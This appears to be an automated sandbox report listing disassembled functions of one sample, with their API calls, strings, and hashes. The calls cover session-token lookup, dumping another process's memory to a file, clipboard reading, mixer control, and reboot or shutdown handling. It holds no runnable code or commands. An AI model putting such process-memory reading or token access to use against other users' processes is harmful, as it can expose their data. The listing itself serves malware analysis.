API String ID: 2881943006-572158859
Opcode ID: 3a3ef394ac1d735f264870f41a62fae539d14c81cfca83dce277a7700da7d271
Instruction ID: 97b3f0a5e38dcf2a2bbded905131b1240ae6be1fc2c005927144d29ad49e0a37
Opcode Fuzzy Hash: 3a3ef394ac1d735f264870f41a62fae539d14c81cfca83dce277a7700da7d271
Instruction Fuzzy Hash: 6801D472604214BAEB156761EE4AEDF7A68EB08790F20006AF701A51E1DAB85E90969C

Function 00401337 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 00401342
GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 00401356
GetModuleHandleA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId), ref: 00401365
GetProcAddress.KERNEL32(00000000), ref: 0040136C

Strings

Wtsapi32.dll, xrefs: 0040133D
WTSQueryUserToken, xrefs: 0040134E
WTSGetActiveConsoleSessionId, xrefs: 00401358
kernel32.dll, xrefs: 0040135D

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: WTSGetActiveConsoleSessionId$WTSQueryUserToken$Wtsapi32.dll$kernel32.dll
API String ID: 384173800-3706966797
Opcode ID: 6348a0e7596f961508ea6e444d4c3f672460083c314aa21270812c6c8cc98636
Instruction ID: 26eef9c0c2c4dd15919d02020d79a78441eba21bc67845e18bcb2a4146193567
Opcode Fuzzy Hash: 6348a0e7596f961508ea6e444d4c3f672460083c314aa21270812c6c8cc98636
Instruction Fuzzy Hash: CDE04F70A41341AEC7205FB1AD08B867EA4EB88701721C92FE346D2560C2B850D0CB18

Function 00401338 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 00401342
GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 00401356
GetModuleHandleA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId), ref: 00401365
GetProcAddress.KERNEL32(00000000), ref: 0040136C

Strings

Wtsapi32.dll, xrefs: 0040133D
WTSQueryUserToken, xrefs: 0040134E
WTSGetActiveConsoleSessionId, xrefs: 00401358
kernel32.dll, xrefs: 0040135D

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: WTSGetActiveConsoleSessionId$WTSQueryUserToken$Wtsapi32.dll$kernel32.dll
API String ID: 384173800-3706966797
Opcode ID: efbb330000446e8a5bd1409cf15514eb86eb39e018988111ca841d5cfeb9be96
Instruction ID: 0d1ff7833945cd92384e77ed92fb2f47f6c04f64277ab295d2034056d9d2295a
Opcode Fuzzy Hash: efbb330000446e8a5bd1409cf15514eb86eb39e018988111ca841d5cfeb9be96
Instruction Fuzzy Hash: 9BE0E671A453416EC7209FF5AD499867E94DA8C701351C51FF346D3560C5B851D0CB18

Function 00404F4B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000010,00000000,?), ref: 00404F5D
GetLastError.KERNEL32 ref: 00405063

Part of subcall function 0040218D: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,004016DF,?), ref: 0040219F

??2@YAPAXI@Z.MSVCRT ref: 00404F95
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00404FDC
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404FFF

Part of subcall function 0040266F: ??2@YAPAXI@Z.MSVCRT ref: 00402688
Part of subcall function 0040266F: ??2@YAPAXI@Z.MSVCRT ref: 00402692
Part of subcall function 0040266F: sprintf.MSVCRT ref: 004026D2
Part of subcall function 0040266F: sprintf.MSVCRT ref: 00402700
Part of subcall function 0040266F: memcpy.MSVCRT ref: 00402711
Part of subcall function 0040266F: memset.MSVCRT ref: 0040273D

??3@YAXPAX@Z.MSVCRT ref: 0040503C
CloseHandle.KERNEL32(?), ref: 00405045
GetLastError.KERNEL32 ref: 0040504F
CloseHandle.KERNEL32(?), ref: 0040505B

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??2@$CloseErrorFileHandleLastProcesssprintf$??3@CreateMemoryOpenReadWritememcpymemset
String ID:
API String ID: 334055115-0
Opcode ID: 44e798f75465846d2123c180c704677b93b10b8872cd875c700e04b84f409f6d
Instruction ID: 8d6a7600804564e283efc79d49e847cea017228f8cd8c6168679aa9411aead0f
Opcode Fuzzy Hash: 44e798f75465846d2123c180c704677b93b10b8872cd875c700e04b84f409f6d
Instruction Fuzzy Hash: 22410671C0021AEBCF109F94D9459EFBFB5EF48310F20416AFA11B62A0D7745A50DF99

Function 00408708 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 86windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00403049: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,00408737,?,?,?,?,004098CB,?,?,?,?), ref: 00403062
Part of subcall function 00403049: FindClose.KERNEL32(00000000), ref: 0040308E

memset.MSVCRT ref: 0040874E

Part of subcall function 0040867B: memset.MSVCRT ref: 004086B0

??3@YAXPAX@Z.MSVCRT ref: 004087AA
GetLastError.KERNEL32(?,?,?,?,004098CB,?,?,?,?,?,paramsfile,?,showerror,?,?,?), ref: 004087C0
sprintf.MSVCRT ref: 004087E8
MessageBoxA.USER32(?,?,Error,00000030), ref: 0040880F

Strings

Error %d: %s, xrefs: 004087E2
Error, xrefs: 00408800

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$??3@CloseErrorFileFindLastMessageSizesprintf
String ID: Error$Error %d: %s
API String ID: 2289626473-1552265934
Opcode ID: c9e360a68dde2b7a8b6b336e3219a45f34f5f322371a62579b34446d908d34f0
Instruction ID: 2b0addeae1234f2d4df83b5ff7b58743cabf24c8023b42bd1644d3513e5ea8ef
Opcode Fuzzy Hash: c9e360a68dde2b7a8b6b336e3219a45f34f5f322371a62579b34446d908d34f0
Instruction Fuzzy Hash: 163152B290020DAFDB10DFA5CE819DFB7BCAB44304F14807BE645B2191DB789B858F69

Function 00409E3E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55registrywindowCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 00409D6D
??3@YAXPAX@Z.MSVCRT ref: 00409E43
GetLastError.KERNEL32 ref: 00409EBF
sprintf.MSVCRT ref: 00409EE7
MessageBoxA.USER32(?,?,Error,00000030), ref: 00409F0E

Strings

Error %d: %s, xrefs: 00409EE1
Error, xrefs: 00409EFF

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??3@CloseErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 588451611-1552265934
Opcode ID: 5b13c391188e7e506aac682ed7990418542ad97ca54ca3ac3e9188c1d36c7cc9
Instruction ID: f2bfff81e589ab9835e9ea21f1fb15b41cda25448981efc368857d3edfb57076
Opcode Fuzzy Hash: 5b13c391188e7e506aac682ed7990418542ad97ca54ca3ac3e9188c1d36c7cc9
Instruction Fuzzy Hash: 6F11A0B1900248EBDB20AF61DC05ADA37A8AB44344F144077FE05E12B6D77C8DD1CF68

Function 0040A452 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0040A0B9
sprintf.MSVCRT ref: 0040A0E1
GetProcAddress.KERNEL32(?,AbortSystemShutdownA), ref: 0040A46A
FreeLibrary.KERNEL32(?,?,?,AbortSystemShutdownA), ref: 0040A477

Strings

Error %d: %s, xrefs: 0040A0DB
AbortSystemShutdownA, xrefs: 0040A464
Error, xrefs: 0040A100

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressErrorFreeLastLibraryProcsprintf
String ID: AbortSystemShutdownA$Error$Error %d: %s
API String ID: 2472910298-3897781915
Opcode ID: b2b788a32d1883b12259489f9b7f81ee4a3001ece04562f743b1d2b5ba89a834
Instruction ID: ac2001943e357a18f069c9456b0646dfe142ff3cc735175cf91749bdf5baa7fd
Opcode Fuzzy Hash: b2b788a32d1883b12259489f9b7f81ee4a3001ece04562f743b1d2b5ba89a834
Instruction Fuzzy Hash: B0018FB1E01254ABD7209FA1DC88DDA73ACAB08700F104077FB16E2162D77C8AD18F5D

Function 00404181 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404255
memset.MSVCRT ref: 004042B3
memset.MSVCRT ref: 0040432B
memset.MSVCRT ref: 00404386
memcpy.MSVCRT ref: 00404416
memset.MSVCRT ref: 00404440

Strings

W, xrefs: 004044A6
<A, xrefs: 004044B6

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$memcpy
String ID: W$<A
API String ID: 368790112-3071812639
Opcode ID: d325a2dc12cc95ed9dfb33565458ef5cee3e0695060eeba7fc4bcd62b49e775e
Instruction ID: 500fd79071ab86fe505ed761889e1ff5b684fc80b457be196aa9ae19c503275b
Opcode Fuzzy Hash: d325a2dc12cc95ed9dfb33565458ef5cee3e0695060eeba7fc4bcd62b49e775e
Instruction Fuzzy Hash: 3C91FFB0210601ABD314CF14D9817A9F3B5BFD4300F25C17EE609AB7E1E3B8A991978A

Function 004049B9 Relevance: 12.2, APIs: 8, Instructions: 156COMMON

Download Yara Rule

APIs

mixerOpen.WINMM(?,?,00000000,00000000,00000000), ref: 004049E0
memset.MSVCRT ref: 004049FB
mixerGetLineInfoA.WINMM(?,?,00000003), ref: 00404A1F
memset.MSVCRT ref: 00404A43
mixerGetLineControlsA.WINMM(?,?,00000002), ref: 00404A8E
mixerGetControlDetailsA.WINMM(?,?,00000000), ref: 00404AD4
mixerSetControlDetails.WINMM(?,?,00000000), ref: 00404B48
mixerClose.WINMM(?), ref: 00404B52

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: mixer$ControlDetailsLinememset$CloseControlsInfoOpen
String ID:
API String ID: 292444528-0
Opcode ID: 0b5423add08441b12f2c1f13951b900b79bb82f6461e71bd7c6f131234328e7d
Instruction ID: cc02ddfe859e430582380af17401937a65d1f9b3007320c5dbb1f5fda4e92ed6
Opcode Fuzzy Hash: 0b5423add08441b12f2c1f13951b900b79bb82f6461e71bd7c6f131234328e7d
Instruction Fuzzy Hash: D351E4B190025CEFDB21CF68C885AEE7BB9FB48344F10416AFA15A7251E379E985CF44

Function 00401697 Relevance: 10.7, APIs: 7, Instructions: 177clipboardcomCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 004016B1

Part of subcall function 0040218D: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,004016DF,?), ref: 0040219F

memset.MSVCRT ref: 00401702
memset.MSVCRT ref: 00401733
GetClipboardFormatNameA.USER32(?,?,0000004F), ref: 0040179E
ReleaseStgMedium.OLE32(?), ref: 004017D2
ReleaseStgMedium.OLE32(?), ref: 00401881

Part of subcall function 0040162E: GlobalFix.KERNEL32(?), ref: 00401644
Part of subcall function 0040162E: GlobalSize.KERNEL32(?), ref: 0040164D
Part of subcall function 0040162E: GlobalUnWire.KERNEL32(?), ref: 00401658

CloseHandle.KERNEL32(?), ref: 00401894

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Global$ClipboardMediumReleasememset$CloseCreateFileFormatHandleNameSizeWire
String ID:
API String ID: 1404662128-0
Opcode ID: ab0bc29bf6e4bcb4a59d2fe8713421396d52c1826c8b1636e2b49447c61d99f2
Instruction ID: 0d5d384d6e62ffe01dbaa586bdffd479ec0854c60e4062254db1bef4341648e4
Opcode Fuzzy Hash: ab0bc29bf6e4bcb4a59d2fe8713421396d52c1826c8b1636e2b49447c61d99f2
Instruction Fuzzy Hash: 2B615772900229AFCB11DFA5C8849EEB7B9BF48700F10846AE505B72A0E7359A45CFA5

Function 0040F022 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0040F089
GetLastError.KERNEL32 ref: 0040F09A
GetLastError.KERNEL32 ref: 0040F0E3
GetLastError.KERNEL32 ref: 0040F0F2
GetLastError.KERNEL32 ref: 0040F107

Strings

ServicesActive, xrefs: 0040F02E

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: ServicesActive
API String ID: 1452528299-3071072050
Opcode ID: 5c01dd51a91895242cd9c86eafef5d441af96e48ca6306b650e42bbdfb25874f
Instruction ID: a47c7843befa977075a05aa35dc223e48572644a5a15d880d4c44da358c00c12
Opcode Fuzzy Hash: 5c01dd51a91895242cd9c86eafef5d441af96e48ca6306b650e42bbdfb25874f
Instruction Fuzzy Hash: 7521FE30901205EBDF21AF61DC48BEE7BB8BF08715F148076E505B1591D7788A49DB5D

Function 0040848D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040849B
memset.MSVCRT ref: 004084F0
WideCharToMultiByte.KERNEL32(00000000,00000000,-00000200,000000FF,?,000000FF,00000000,00000000), ref: 0040850D

Part of subcall function 00402FEE: strlen.MSVCRT ref: 00403012
Part of subcall function 00402FEE: memcpy.MSVCRT ref: 00403032

Part of subcall function 00402FEE: strlen.MSVCRT ref: 00403007

MessageBoxA.USER32(00000000,00411F27,Sound Devices,00000000), ref: 0040855C
??3@YAXPAX@Z.MSVCRT ref: 00408567

Strings

Sound Devices, xrefs: 00408555

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: strlen$??3@ByteCharInitializeMessageMultiWidememcpymemset
String ID: Sound Devices
API String ID: 602576698-445005488
Opcode ID: ff82af2667900e64cdbd587b9ebe1b2d2d097a4538d70ab161d5af8ed3d7d8d1
Instruction ID: 6b950990b8c66530d221aa6a0c04066817447a33d84bc16703da5d5b3675b2ac
Opcode Fuzzy Hash: ff82af2667900e64cdbd587b9ebe1b2d2d097a4538d70ab161d5af8ed3d7d8d1
Instruction Fuzzy Hash: A421CBB180011DBFD710AF55DD859EFB77CAF04354F1041BEF615B3292D6385E848AA8

Function 00409E53 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00409EBF
sprintf.MSVCRT ref: 00409EE7
MessageBoxA.USER32(?,?,Error,00000030), ref: 00409F0E

Part of subcall function 0040E6E6: memset.MSVCRT ref: 0040E71E
Part of subcall function 0040E6E6: memcpy.MSVCRT ref: 0040E729
Part of subcall function 0040E6E6: strlen.MSVCRT ref: 0040E736
Part of subcall function 0040E6E6: strcmp.MSVCRT ref: 0040E74D
Part of subcall function 0040E6E6: GetCurrentProcess.KERNEL32 ref: 0040E75A
Part of subcall function 0040E6E6: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040E76F
Part of subcall function 0040E6E6: GetProcAddress.KERNEL32(00000000), ref: 0040E776
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7BC
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7D4
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7EC
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E804
Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E81C

Part of subcall function 0040E8BC: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,0040EA34,?,?,?,0002001F), ref: 0040E8CE

Strings

Error %d: %s, xrefs: 00409EE1
The specified key is not valid !, xrefs: 00409CC8
Error, xrefs: 00409EFF

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$AddressCurrentErrorHandleLastMessageModuleOpenProcProcessmemcpymemsetsprintfstrcmpstrlen
String ID: Error$Error %d: %s$The specified key is not valid !
API String ID: 3865408157-1131720034
Opcode ID: 42a784d353856db3e6df1b1f870fb6a2fae71a5d94022a203ba2e0d0bec324f2
Instruction ID: 221a0bed227f0a0d1291a42762b6dca073c9be0b74f9eacabf5e1f3fe4b994a9
Opcode Fuzzy Hash: 42a784d353856db3e6df1b1f870fb6a2fae71a5d94022a203ba2e0d0bec324f2
Instruction Fuzzy Hash: C6216AB29002589BDB209F61DC459DA37A9FB48744F24057BFD14E22A3E739D981CF98

Function 0040A498 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405984: _strcmpi.MSVCRT ref: 00405997

atoi.MSVCRT ref: 0040A4DD
GetLastError.KERNEL32 ref: 0040A508
sprintf.MSVCRT ref: 0040A530

Strings

Error %d: %s, xrefs: 0040A52A
reboot, xrefs: 0040A4B7
force, xrefs: 0040A4A0
Error, xrefs: 0040A550

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ErrorLast_strcmpiatoisprintf
String ID: Error$Error %d: %s$force$reboot
API String ID: 479048450-3867161120
Opcode ID: c9387518b18918b56ce17fe4955c0d0f4d200beb2a723a9ea293e38b76875782
Instruction ID: 505fe02bc723ab127a7aee38737edb61bd6ed931556cf03faf7b566618cf9676
Opcode Fuzzy Hash: c9387518b18918b56ce17fe4955c0d0f4d200beb2a723a9ea293e38b76875782
Instruction Fuzzy Hash: D911DDB29002049BEB209F21CC45BEA7398AF44359F14057BFD14F6292D7BCD585CF58

Function 0040EE16 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44sleepprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EBBE: EnumWindows.USER32(Function_0000EB42,?), ref: 0040EBCE

WinExec.KERNEL32(regedit.exe,00000005), ref: 0040EE2C
GetWindowLongA.USER32(?,000000F0), ref: 0040EE3F
ShowWindow.USER32(?,00000009,?,?,0040A031,?,?), ref: 0040EE50
SetForegroundWindow.USER32(?), ref: 0040EE58
Sleep.KERNEL32(00000064,?,?,0040A031,?,?), ref: 0040EE6A

Strings

regedit.exe, xrefs: 0040EE27

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$EnumExecForegroundLongShowSleepWindows
String ID: regedit.exe
API String ID: 2288784986-3532722396
Opcode ID: a8f636d2e51d0afa5aab2da2c5faa6d7d014c79bce6297dafbd60a2399fc7468
Instruction ID: 06b5dbe14a403dfdfde3d240e558f745117ddf8b4c9bbaf8e868fce31c675668
Opcode Fuzzy Hash: a8f636d2e51d0afa5aab2da2c5faa6d7d014c79bce6297dafbd60a2399fc7468
Instruction Fuzzy Hash: F701A2352043016FE7103F63DC89B9B7B65BF48754F048A36BA15B11F1DB799C708A59

Function 0040EAC7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EAE8
GetClassNameA.USER32(?,00000000,000000FF), ref: 0040EAFC
_strcmpi.MSVCRT ref: 0040EB0E
_strcmpi.MSVCRT ref: 0040EB2B

Strings

SysListView32, xrefs: 0040EB08
SysTreeView32, xrefs: 0040EB25

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _strcmpi$ClassNamememset
String ID: SysListView32$SysTreeView32
API String ID: 538907304-676203472
Opcode ID: 9a17f16003ffebb12cd39ee98549005b67c7db4a5abf7fe2706005f807c12da0
Instruction ID: 94bfcd5f7330f9d384e7a99c0efc30348f28293cccce4688d0165577fa633baf
Opcode Fuzzy Hash: 9a17f16003ffebb12cd39ee98549005b67c7db4a5abf7fe2706005f807c12da0
Instruction Fuzzy Hash: AB01AE739041196AEB10D655DC01BD6B7ACEF58314F104077F549F3145E6B4A6D48794

Function 0040DA35 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(rasdlg.dll), ref: 0040DA44
GetProcAddress.KERNEL32(00000000,RasDialDlgA), ref: 0040DA56
FreeLibrary.KERNEL32(00000000), ref: 0040DA8B

Strings

$, xrefs: 0040DA79
rasdlg.dll, xrefs: 0040DA3D
RasDialDlgA, xrefs: 0040DA50

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: $$RasDialDlgA$rasdlg.dll
API String ID: 145871493-203725436
